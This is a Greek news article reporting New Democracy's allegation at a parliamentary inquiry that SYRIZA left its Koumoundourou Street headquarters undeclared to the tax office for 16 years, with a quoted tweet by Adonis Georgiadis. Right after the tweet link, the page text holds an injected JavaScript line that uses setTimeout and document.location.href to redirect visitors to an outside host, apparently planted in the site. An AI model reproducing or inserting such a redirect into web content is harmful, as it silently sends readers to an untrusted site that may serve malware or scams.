Η ΝΔ καταγγέλλει ΣΥΡΙΖΑ: Δεν δήλωνε το ακίνητο της Κουμουνδούρου επί 16 χρόνια

0
13

Το θέμα του κτιρίου στην οδό Κουμουνδούρου όπου στεγάζονται τα γραφεία του ΣΥΡΙΖΑ έθεσε εκ νέου σήμερα στην εξεταστική επιτροπή η Νέα Δημοκρατία.

Ο Γιώργος Γεωργαντάς, στην εξεταστική επιτροπή της Βουλής που ερευνά τα δάνεια των κομμάτων και των ΜΜΕ, υποστήριξε ότι επί 16 έτη δεν έχει δηλωθεί στην εφορία και κατ” επέκταση ο ιδιοκτήτης του δεν έχει πληρώσει τους αναλογούντες φόρους.

Ειδικότερα, ο κ. Γεωργαντάς, επικαλούμενος έγγραφα που οι υπεύθυνοι οικονομιών θεμάτων του ΣΥΡΙΖΑ έχουν καταθέσει στην εξεταστική, υποστήριξε ότι μόλις στις 14 Νοεμβρίου τα στελέχη του κυβερνητικού κόμματος κατέθεσαν στην 6η εφορία Αθηνών 16 διαδοχικές δηλώσεις για κάθε έτος από το 2001!

Σύμφωνα πάντα με τον βουλευτή της αξιωματικής αντιπολίτευσης, η μη υποβολή δηλώσεων επί τόσα χρόνια είχε ως αποτέλεσμα την αποφυγή πληρωμής του φόρου ακίνητης περιουσίας, του ενιαίου τέλους ακινήτων νομικών προσώπων, του ΕΝΦΙΑ κ.α.

Ο κ. Γεωργαντάς, είπε χαρακτηριστικά: «Είναι η απόλυτη απόδειξη μιας ιστορίας η οποία δεν είναι καθόλου νόμιμη».
Ο Αντιπρόεδρος της Νεας Δημοκρατίας ΆδωνιςΓεωργιάδης σε ανάρτηση του στον λογαρισμό του στο Twitter έγραψε χαρακτηριστικά: Τελικά οι του Σύριζα δεν ήταν του Κινήματος «Δεν πληρώνω» αλλά «Δεν δηλωνω»…

https://twitter.com/AdonisGeorgiadi/status/801847242797830148 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here